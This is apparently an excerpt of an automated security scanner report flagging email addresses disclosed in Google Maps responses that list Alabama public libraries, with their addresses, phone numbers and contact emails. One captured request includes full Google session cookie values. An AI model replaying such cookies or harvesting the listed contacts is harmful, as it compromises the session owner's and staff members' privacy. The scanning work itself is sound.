brary",description:"\x3cb\x3eBrewton Public Library\x3c/b\x3e\x3cbr\x3e206 West Jackson Street\x3cbr\x3eBrewton, AL 36426-1518\x3cbr\x3e251-867-4626\x3cbr\x3e251-809-1749\x3cbr\x3e\x3ca href=\"mailto:bswalker@cityofbrewton.org\" target=\"_blank\"\x3ebswalker@cityofbrewton.org\x3c/a\x3e",infoWindow:{title:"Brewton Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Brewton Public Library206 West Jackson StreetBrewton, AL 36426-1518251-867-4626",dscr:"\x3cb\x3eBrewton Public Library\x3c/b\x3e\x3cbr\x3e206 West Jackson Street\x3cbr\x3eBrewton, AL 36426-1518\x3cbr\x3e251-867-4626\x3cbr\x3e251-809-1749\x3cbr\x3e\x3ca href=\"mailto:bswalker@cityofbrewton.org\" target=\"_blank\"\x3ebswalker@cityofbrewton.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.120369,-87.070431\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
scription:"\x3cb\x3eEscambia Co. Coop. Library System\x3c/b\x3e\x3cbr\x3e700 East Church Street\x3cbr\x3eAtmore, AL 36502-2694\x3cbr\x3e251-368-4130\x3cbr\x3e334-368-4130\x3cbr\x3e\x3ca href=\"mailto:escolib@frontiernet.net\" target=\"_blank\"\x3eescolib@frontiernet.net\x3c/a\x3e",infoWindow:{title:"Escambia Co. Coop. Library System",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Escambia Co. Coop. Library System700 East Church StreetAtmore, AL 36502-26
...[SNIP]...
251",dscr:"\x3cb\x3eEscambia Co. Coop. Library System\x3c/b\x3e\x3cbr\x3e700 East Church Street\x3cbr\x3eAtmore, AL 36502-2694\x3cbr\x3e251-368-4130\x3cbr\x3e334-368-4130\x3cbr\x3e\x3ca href=\"mailto:escolib@frontiernet.net\" target=\"_blank\"\x3eescolib@frontiernet.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.022754,-87.485663\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
escription:"\x3cb\x3eNorth Shelby County Library\x3c/b\x3e\x3cbr\x3e5521 Cahaba Valley Road\x3cbr\x3eBirmingham, AL 35242-4901\x3cbr\x3e205-439-5500\x3cbr\x3e205-439-5503\x3cbr\x3e\x3ca href=\"mailto:nsldirector@shelbycounty-al.org\" target=\"_blank\"\x3ensldirector@shelbycounty-al.org\x3c/a\x3e",infoWindow:{title:"North Shelby County Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"North Shelby County Library5521 Cahaba Valley RoadBirmingham, AL 35242-4901205-",dscr:"\x3cb\x3eNorth Shelby County Library\x3c/b\x3e\x3cbr\x3e5521 Cahaba Valley Road\x3cbr\x3eBirmingham, AL 35242-4901\x3cbr\x3e205-439-5500\x3cbr\x3e205-439-5503\x3cbr\x3e\x3ca href=\"mailto:nsldirector@shelbycounty-al.org\" target=\"_blank\"\x3ensldirector@shelbycounty-al.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.364573,-86.720418\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
lic Library",description:"\x3cb\x3ePelham Public Library\x3c/b\x3e\x3cbr\x3e3160 Pelham Parkway\x3cbr\x3ePelham, AL 35124-1627\x3cbr\x3e205-620-6418\x3cbr\x3e205-620-6470\x3cbr\x3e\x3ca href=\"mailto:broberts@pelhamonline.com\" target=\"_blank\"\x3ebroberts@pelhamonline.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.pelhamlibrary.com\" target=\"_blank\"\x3ehttp://www.pelhamlibrary.com\x3c/a\x3e",infoWindow:{title:"Pelham Public Library",basics:"\x3cdiv transclude=\"iw\"\
...[SNIP]...
205-620-6418205-62",dscr:"\x3cb\x3ePelham Public Library\x3c/b\x3e\x3cbr\x3e3160 Pelham Parkway\x3cbr\x3ePelham, AL 35124-1627\x3cbr\x3e205-620-6418\x3cbr\x3e205-620-6470\x3cbr\x3e\x3ca href=\"mailto:broberts@pelhamonline.com\" target=\"_blank\"\x3ebroberts@pelhamonline.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.pelhamlibrary.com\" target=\"_blank\"\x3ehttp://www.pelhamlibrary.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90
...[SNIP]...
y",description:"\x3cb\x3eVernice Stoudenmire Library\x3c/b\x3e\x3cbr\x3e9905 N Main Street\x3cbr\x3eWilsonville, AL 35186-0024\x3cbr\x3e205-669-6180\x3cbr\x3e205-669-6205\x3cbr\x3e\x3ca href=\"mailto:wilsonville@shelbycounty-al.org\" target=\"_blank\"\x3ewilsonville@shelbycounty-al.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.shelbycounty-al.org\" target=\"_blank\"\x3ewww.shelbycounty-al.org\x3c/a\x3e",infoWindow:{title:"Vernice Stoudenmire Library",basics:"\x3cdiv transclude=\"iw\"\x3e\
...[SNIP]...
205-669-",dscr:"\x3cb\x3eVernice Stoudenmire Library\x3c/b\x3e\x3cbr\x3e9905 N Main Street\x3cbr\x3eWilsonville, AL 35186-0024\x3cbr\x3e205-669-6180\x3cbr\x3e205-669-6205\x3cbr\x3e\x3ca href=\"mailto:wilsonville@shelbycounty-al.org\" target=\"_blank\"\x3ewilsonville@shelbycounty-al.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.shelbycounty-al.org\" target=\"_blank\"\x3ewww.shelbycounty-al.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x
...[SNIP]...
l Library",description:"\x3cb\x3eDoris Stanley Memorial Library\x3c/b\x3e\x3cbr\x3e1515 Bookmark Lane\x3cbr\x3eMoody, AL 35004\x3cbr\x3e205-640-2517\x3cbr\x3e205-640-2500\x3cbr\x3e\x3ca href=\"mailto:dsml@charter.net\" target=\"_blank\"\x3edsml@charter.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.stclaircountyal.com/libraries/moody.htm\" target=\"_blank\"\x3ehttp://www.stclaircountyal.com/libraries/moody.htm\x3c/a\x3e",infoWindow:{title:"Doris Stanley
...[SNIP]...
205-640-2517205-",dscr:"\x3cb\x3eDoris Stanley Memorial Library\x3c/b\x3e\x3cbr\x3e1515 Bookmark Lane\x3cbr\x3eMoody, AL 35004\x3cbr\x3e205-640-2517\x3cbr\x3e205-640-2500\x3cbr\x3e\x3ca href=\"mailto:dsml@charter.net\" target=\"_blank\"\x3edsml@charter.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.stclaircountyal.com/libraries/moody.htm\" target=\"_blank\"\x3ehttp://www.stclaircountyal.com/libraries/moody.htm\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://
...[SNIP]...
me:"Odenville Public Library",description:"\x3cb\x3eOdenville Public Library\x3c/b\x3e\x3cbr\x3e200 Alabama Street\x3cbr\x3eOdenville, AL 35120-0249\x3cbr\x3e205-629-5901\x3cbr\x3e\x3ca href=\"mailto:odenlib@alltel.net\" target=\"_blank\"\x3eodenlib@alltel.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.stclaircountyal.com/libraries/odenville.htm\" target=\"_blank\"\x3ehttp://www.stclaircountyal.com/libraries/odenville.htm\x3c/a\x3e",infoWindow:{title:"Odenv
...[SNIP]...
nville, AL 35120-0249205-629-5901o",dscr:"\x3cb\x3eOdenville Public Library\x3c/b\x3e\x3cbr\x3e200 Alabama Street\x3cbr\x3eOdenville, AL 35120-0249\x3cbr\x3e205-629-5901\x3cbr\x3e\x3ca href=\"mailto:odenlib@alltel.net\" target=\"_blank\"\x3eodenlib@alltel.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.stclaircountyal.com/libraries/odenville.htm\" target=\"_blank\"\x3ehttp://www.stclaircountyal.com/libraries/odenville.htm\x3c/a\x3e",dscr_dir:"ltr",photoUrl:
...[SNIP]...
ary",description:"\x3cb\x3ePell City Public Library\x3c/b\x3e\x3cbr\x3e1923 1st Avenue North\x3cbr\x3ePell City, AL 35125-1663\x3cbr\x3e205-884-1015\x3cbr\x3e205-338-2320\x3cbr\x3e\x3ca href=\"mailto:danny@asc.edu\" target=\"_blank\"\x3edanny@asc.edu\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://stclaircountyal.com/libraries/pell_city.htm\" target=\"_blank\"\x3ehttp://stclaircountyal.com/libraries/pell_city.htm\x3c/a\x3e",infoWindow:{title:"Pell City Pub
...[SNIP]...
205-884-10",dscr:"\x3cb\x3ePell City Public Library\x3c/b\x3e\x3cbr\x3e1923 1st Avenue North\x3cbr\x3ePell City, AL 35125-1663\x3cbr\x3e205-884-1015\x3cbr\x3e205-338-2320\x3cbr\x3e\x3ca href=\"mailto:danny@asc.edu\" target=\"_blank\"\x3edanny@asc.edu\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://stclaircountyal.com/libraries/pell_city.htm\" target=\"_blank\"\x3ehttp://stclaircountyal.com/libraries/pell_city.htm\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://
...[SNIP]...
c Library",description:"\x3cb\x3eSpringville Public Library\x3c/b\x3e\x3cbr\x3e6496 US 11 \x3cbr\x3eSpringville, AL 35146-9330\x3cbr\x3e205-467-2339\x3cbr\x3e205-467-2239\x3cbr\x3e\x3ca href=\"mailto:spvlib@alltel.net\" target=\"_blank\"\x3espvlib@alltel.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.stclaircountyal.com/libraries/springville.htm\" target=\"_blank\"\x3ehttp://www.stclaircountyal.com/libraries/springville.htm\x3c/a\x3e",infoWindow:{title:"S
...[SNIP]...
205-467-2339205-",dscr:"\x3cb\x3eSpringville Public Library\x3c/b\x3e\x3cbr\x3e6496 US 11 \x3cbr\x3eSpringville, AL 35146-9330\x3cbr\x3e205-467-2339\x3cbr\x3e205-467-2239\x3cbr\x3e\x3ca href=\"mailto:spvlib@alltel.net\" target=\"_blank\"\x3espvlib@alltel.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.stclaircountyal.com/libraries/springville.htm\" target=\"_blank\"\x3ehttp://www.stclaircountyal.com/libraries/springville.htm\x3c/a\x3e",dscr_dir:"ltr",photo
...[SNIP]...

22.70. http://maps.google.com/maps/sf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/sf

Issue detail

The following email addresses were disclosed in the response:

Request

GET /maps/sf?q=http%3A%2F%2Fwww.alabama.gov%2Frss%2Fmaps_LIBRARIES.kml&start=200&jsv=310c&vps=1&source=maps_api&callback=_xdc_._mgn3tnshi HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.alabama.gov/portal/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=DEntMOM-vLiKsZ_1SG3HUd0B0oGbRKXtRpi1pq3lEVMkOSBMrvdVv72rCBr0341W89kHA-PBZDI3vmV4fFluvryIdICZc8i1bWqGwoBC29F_oZvehlhP4A1MlN_8jpYE

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 30 Apr 2011 00:36:52 GMT
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 30 Apr 2011 00:36:52 GMT
Server: mfe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 23296

_xdc_._mgn3tnshi && _xdc_._mgn3tnshi({"name":"http://www.alabama.gov/rss/maps_LIBRARIES.kml","Status":{"code":200,"request":"geoxml"},viewport: {center: {lat: 32.656876,lng: -86.656030},span: {lat: 0.
...[SNIP]...
rary",description:"\x3cb\x3eWhite Smith Memorial Library\x3c/b\x3e\x3cbr\x3e213 College Avenue\x3cbr\x3eJackson, AL 36545-0265\x3cbr\x3e251-246-4962\x3cbr\x3e251-246-4962\x3cbr\x3e\x3ca href=\"mailto:wsmlibrary@yahoo.com\" target=\"_blank\"\x3ewsmlibrary@yahoo.com\x3c/a\x3e",infoWindow:{title:"White Smith Memorial Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"White Smith Memorial Library213 College AvenueJackson, AL 36545-0265251-246-496",dscr:"\x3cb\x3eWhite Smith Memorial Library\x3c/b\x3e\x3cbr\x3e213 College Avenue\x3cbr\x3eJackson, AL 36545-0265\x3cbr\x3e251-246-4962\x3cbr\x3e251-246-4962\x3cbr\x3e\x3ca href=\"mailto:wsmlibrary@yahoo.com\" target=\"_blank\"\x3ewsmlibrary@yahoo.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.512221,-87.893789\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
ary",description:"\x3cb\x3eAshland City Public Library\x3c/b\x3e\x3cbr\x3e11 2nd Avenue North\x3cbr\x3eAshland , AL 36251-0296\x3cbr\x3e256-354-3427\x3cbr\x3e256-354-3427\x3cbr\x3e\x3ca href=\"mailto:ashlibrary@centurytel.net\" target=\"_blank\"\x3eashlibrary@centurytel.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.cheaharegionallibrary.org\" target=\"_blank\"\x3ehttp://www.cheaharegionallibrary.org\x3c/a\x3e",infoWindow:{title:"Ashland City Public Library",basics:"\x3c
...[SNIP]...
256-354-34",dscr:"\x3cb\x3eAshland City Public Library\x3c/b\x3e\x3cbr\x3e11 2nd Avenue North\x3cbr\x3eAshland , AL 36251-0296\x3cbr\x3e256-354-3427\x3cbr\x3e256-354-3427\x3cbr\x3e\x3ca href=\"mailto:ashlibrary@centurytel.net\" target=\"_blank\"\x3eashlibrary@centurytel.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.cheaharegionallibrary.org\" target=\"_blank\"\x3ehttp://www.cheaharegionallibrary.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=t
...[SNIP]...
Library",description:"\x3cb\x3eLineville Public Library\x3c/b\x3e\x3cbr\x3e60119 Highway 49\x3cbr\x3eLineville, AL 36266-0482\x3cbr\x3e256-396-5162\x3cbr\x3e256-396-5162\x3cbr\x3e\x3ca href=\"mailto:ll@eal.quik.com\" target=\"_blank\"\x3ell@eal.quik.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.cheaharegionallibrary.org\" target=\"_blank\"\x3ehttp://www.cheaharegionallibrary.org\x3c/a\x3e",infoWindow:{title:"Lineville Public Library",basics:"\x3cdiv
...[SNIP]...
256-396-5162256",dscr:"\x3cb\x3eLineville Public Library\x3c/b\x3e\x3cbr\x3e60119 Highway 49\x3cbr\x3eLineville, AL 36266-0482\x3cbr\x3e256-396-5162\x3cbr\x3e256-396-5162\x3cbr\x3e\x3ca href=\"mailto:ll@eal.quik.com\" target=\"_blank\"\x3ell@eal.quik.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.cheaharegionallibrary.org\" target=\"_blank\"\x3ehttp://www.cheaharegionallibrary.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=t
...[SNIP]...
ary",sxcn:"",name:"Eva Public Library",description:"\x3cb\x3eEva Public Library\x3c/b\x3e\x3cbr\x3e4549 Highway 55 East \x3cbr\x3eEva, AL 35621-0099\x3cbr\x3e256-796-8638\x3cbr\x3e\x3ca href=\"mailto:evalib@hiwaay.net\" target=\"_blank\"\x3eevalib@hiwaay.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.lmn.lib.al.us\" target=\"_blank\"\x3ehttp://www.lmn.lib.al.us\x3c/a\x3e",infoWindow:{title:"Eva Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div
...[SNIP]...
st Eva, AL 35621-0099256-796-8638evalib@hiw",dscr:"\x3cb\x3eEva Public Library\x3c/b\x3e\x3cbr\x3e4549 Highway 55 East \x3cbr\x3eEva, AL 35621-0099\x3cbr\x3e256-796-8638\x3cbr\x3e\x3ca href=\"mailto:evalib@hiwaay.net\" target=\"_blank\"\x3eevalib@hiwaay.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.lmn.lib.al.us\" target=\"_blank\"\x3ehttp://www.lmn.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68
...[SNIP]...
me:"Falkville Public Library",description:"\x3cb\x3eFalkville Public Library\x3c/b\x3e\x3cbr\x3e7 North 1st Avenue\x3cbr\x3eFalkville, AL 35622-0407\x3cbr\x3e256-784-5822\x3cbr\x3e\x3ca href=\"mailto:clerkfpl@hiwaay.net\" target=\"_blank\"\x3eclerkfpl@hiwaay.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.lmn.lib.al.us\" target=\"_blank\"\x3ehttp://www.lmn.lib.al.us\x3c/a\x3e",infoWindow:{title:"Falkville Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x
...[SNIP]...
kville, AL 35622-0407256-784-5822c",dscr:"\x3cb\x3eFalkville Public Library\x3c/b\x3e\x3cbr\x3e7 North 1st Avenue\x3cbr\x3eFalkville, AL 35622-0407\x3cbr\x3e256-784-5822\x3cbr\x3e\x3ca href=\"mailto:clerkfpl@hiwaay.net\" target=\"_blank\"\x3eclerkfpl@hiwaay.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.lmn.lib.al.us\" target=\"_blank\"\x3ehttp://www.lmn.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68
...[SNIP]...
y",description:"\x3cb\x3eHartselle Public Library\x3c/b\x3e\x3cbr\x3e152 Sparkman Street NW\x3cbr\x3eHartselle , AL 35640-2402\x3cbr\x3e256-773-9880\x3cbr\x3e256-773-9884\x3cbr\x3e\x3ca href=\"mailto:hartsellelibrary@hotmail.com\" target=\"_blank\"\x3ehartsellelibrary@hotmail.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.lmn.lib.al.us\" target=\"_blank\"\x3ehttp://www.lmn.lib.al.us\x3c/a\x3e",infoWindow:{title:"Hartselle Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x
...[SNIP]...
256-773-",dscr:"\x3cb\x3eHartselle Public Library\x3c/b\x3e\x3cbr\x3e152 Sparkman Street NW\x3cbr\x3eHartselle , AL 35640-2402\x3cbr\x3e256-773-9880\x3cbr\x3e256-773-9884\x3cbr\x3e\x3ca href=\"mailto:hartsellelibrary@hotmail.com\" target=\"_blank\"\x3ehartsellelibrary@hotmail.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.lmn.lib.al.us\" target=\"_blank\"\x3ehttp://www.lmn.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68
...[SNIP]...
ublic Library",description:"\x3cb\x3ePriceville Public Library\x3c/b\x3e\x3cbr\x3e103 Faye Drive\x3cbr\x3ePriceville, AL 35603\x3cbr\x3e256-584-0230\x3cbr\x3e256-584-0230\x3cbr\x3e\x3ca href=\"mailto:prv_library@charter.net\" target=\"_blank\"\x3eprv_library@charter.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.lmn.lib.al.us\" target=\"_blank\"\x3ehttp://www.lmn.lib.al.us\x3c/a\x3e",infoWindow:{title:"Priceville Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\
...[SNIP]...
256-584-0230256-584-",dscr:"\x3cb\x3ePriceville Public Library\x3c/b\x3e\x3cbr\x3e103 Faye Drive\x3cbr\x3ePriceville, AL 35603\x3cbr\x3e256-584-0230\x3cbr\x3e256-584-0230\x3cbr\x3e\x3ca href=\"mailto:prv_library@charter.net\" target=\"_blank\"\x3eprv_library@charter.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.lmn.lib.al.us\" target=\"_blank\"\x3ehttp://www.lmn.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68
...[SNIP]...
",description:"\x3cb\x3eWheeler Basin Regional Library\x3c/b\x3e\x3cbr\x3e504 Cherry Street NE\x3cbr\x3eDecatur, AL 35602-1766\x3cbr\x3e256-353-2993\x3cbr\x3e256-350-6736\x3cbr\x3e\x3ca href=\"mailto:wheelerbasin@prodigy.net\" target=\"_blank\"\x3ewheelerbasin@prodigy.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.lmn.lib.al.us\" target=\"_blank\"\x3ewww.lmn.lib.al.us\x3c/a\x3e",infoWindow:{title:"Wheeler Basin Regional Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x
...[SNIP]...
256-353",dscr:"\x3cb\x3eWheeler Basin Regional Library\x3c/b\x3e\x3cbr\x3e504 Cherry Street NE\x3cbr\x3eDecatur, AL 35602-1766\x3cbr\x3e256-353-2993\x3cbr\x3e256-350-6736\x3cbr\x3e\x3ca href=\"mailto:wheelerbasin@prodigy.net\" target=\"_blank\"\x3ewheelerbasin@prodigy.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.lmn.lib.al.us\" target=\"_blank\"\x3ewww.lmn.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.6072
...[SNIP]...
ary",description:"\x3cb\x3eMarion-Perry County Library\x3c/b\x3e\x3cbr\x3e202 Washington Street\x3cbr\x3eMarion, AL 36756-1824\x3cbr\x3e334-683-6411\x3cbr\x3e334-683-0599\x3cbr\x3e\x3ca href=\"mailto:librar_p@bellsouth.net\" target=\"_blank\"\x3elibrar_p@bellsouth.net\x3c/a\x3e",infoWindow:{title:"Marion-Perry County Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Marion-Perry County Library202 Washington StreetMarion, AL 36756-1824334-683-64",dscr:"\x3cb\x3eMarion-Perry County Library\x3c/b\x3e\x3cbr\x3e202 Washington Street\x3cbr\x3eMarion, AL 36756-1824\x3cbr\x3e334-683-6411\x3cbr\x3e334-683-0599\x3cbr\x3e\x3ca href=\"mailto:librar_p@bellsouth.net\" target=\"_blank\"\x3elibrar_p@bellsouth.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.634278,-87.319075\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
"",name:"Uniontown Public Library",description:"\x3cb\x3eUniontown Public Library\x3c/b\x3e\x3cbr\x3eWalter Avenue\x3cbr\x3eUniontown, AL 36786-0637\x3cbr\x3e334-628-6681\x3cbr\x3e\x3ca href=\"mailto:uniontownbookworm@yahoo.com\" target=\"_blank\"\x3euniontownbookworm@yahoo.com\x3c/a\x3e",infoWindow:{title:"Uniontown Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Uniontown Public LibraryWalter AvenueUniontown, AL 36786-0637334-628-6681uniont",dscr:"\x3cb\x3eUniontown Public Library\x3c/b\x3e\x3cbr\x3eWalter Avenue\x3cbr\x3eUniontown, AL 36786-0637\x3cbr\x3e334-628-6681\x3cbr\x3e\x3ca href=\"mailto:uniontownbookworm@yahoo.com\" target=\"_blank\"\x3euniontownbookworm@yahoo.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.417892,-87.584624\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
scription:"\x3cb\x3eAndalusia Public Library\x3c/b\x3e\x3cbr\x3e212 South Three Notch Street\x3cbr\x3eAndalusia, AL 36420-3710\x3cbr\x3e334-222-6612\x3cbr\x3e334-222-6612\x3cbr\x3e\x3ca href=\"mailto:andylib@alaweb.com\" target=\"_blank\"\x3eandylib@alaweb.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.andylibrary.com\" target=\"_blank\"\x3ehttp://www.andylibrary.com\x3c/a\x3e",infoWindow:{title:"Andalusia Public Library",basics:"\x3cdiv transclude=\"iw\"\x
...[SNIP]...
334",dscr:"\x3cb\x3eAndalusia Public Library\x3c/b\x3e\x3cbr\x3e212 South Three Notch Street\x3cbr\x3eAndalusia, AL 36420-3710\x3cbr\x3e334-222-6612\x3cbr\x3e334-222-6612\x3cbr\x3e\x3ca href=\"mailto:andylib@alaweb.com\" target=\"_blank\"\x3eandylib@alaweb.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.andylibrary.com\" target=\"_blank\"\x3ehttp://www.andylibrary.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26
...[SNIP]...
c Library",description:"\x3cb\x3eEvergreen Public Library\x3c/b\x3e\x3cbr\x3e201 Park Street\x3cbr\x3eEvergreen, AL 36401-2903\x3cbr\x3e251-578-2670\x3cbr\x3e251-587-2316\x3cbr\x3e\x3ca href=\"mailto:evergreen-conecuhlib@barbe-sassy.com\" target=\"_blank\"\x3eevergreen-conecuhlib@barbe-sassy.com\x3c/a\x3e",infoWindow:{title:"Evergreen Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Evergreen Public Library201 Park StreetEvergreen, AL 36401-2903251-578-2670251-",dscr:"\x3cb\x3eEvergreen Public Library\x3c/b\x3e\x3cbr\x3e201 Park Street\x3cbr\x3eEvergreen, AL 36401-2903\x3cbr\x3e251-578-2670\x3cbr\x3e251-587-2316\x3cbr\x3e\x3ca href=\"mailto:evergreen-conecuhlib@barbe-sassy.com\" target=\"_blank\"\x3eevergreen-conecuhlib@barbe-sassy.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.432085,-86.952841\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
brary",description:"\x3cb\x3eGoodwater Public Library\x3c/b\x3e\x3cbr\x3e36 Weogufka Street\x3cbr\x3eGoodwater , AL 35072-0140\x3cbr\x3e256-839-5741\x3cbr\x3e256-839-5741\x3cbr\x3e\x3ca href=\"mailto:gplibrary2003@yahoo.com\" target=\"_blank\"\x3egplibrary2003@yahoo.com\x3c/a\x3e",infoWindow:{title:"Goodwater Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Goodwater Public Library36 Weogufka StreetGoodwater , AL 35072-0140256-839-5741",dscr:"\x3cb\x3eGoodwater Public Library\x3c/b\x3e\x3cbr\x3e36 Weogufka Street\x3cbr\x3eGoodwater , AL 35072-0140\x3cbr\x3e256-839-5741\x3cbr\x3e256-839-5741\x3cbr\x3e\x3ca href=\"mailto:gplibrary2003@yahoo.com\" target=\"_blank\"\x3egplibrary2003@yahoo.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.063408,-86.055434\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
Public Library",description:"\x3cb\x3eRockford Public Library\x3c/b\x3e\x3cbr\x3eMain Street\x3cbr\x3eRockford, AL 35136-0128\x3cbr\x3e256-377-4911\x3cbr\x3e256-377-4489\x3cbr\x3e\x3ca href=\"mailto:rockfordpl@wwisp.com\" target=\"_blank\"\x3erockfordpl@wwisp.com\x3c/a\x3e",infoWindow:{title:"Rockford Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Rockford Public LibraryMain StreetRockford, AL 35136-0128256-377-4911256-377-44",dscr:"\x3cb\x3eRockford Public Library\x3c/b\x3e\x3cbr\x3eMain Street\x3cbr\x3eRockford, AL 35136-0128\x3cbr\x3e256-377-4911\x3cbr\x3e256-377-4489\x3cbr\x3e\x3ca href=\"mailto:rockfordpl@wwisp.com\" target=\"_blank\"\x3erockfordpl@wwisp.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.894216,-86.167880\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...

22.71. http://maps.google.com/maps/sf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/sf

Issue detail

The following email addresses were disclosed in the response:

Request

GET /maps/sf?q=http%3A%2F%2Fwww.alabama.gov%2Frss%2Fmaps_LIBRARIES.kml&start=150&jsv=310c&vps=1&source=maps_api&callback=_xdc_._lgn3tnqv3 HTTP/1.1
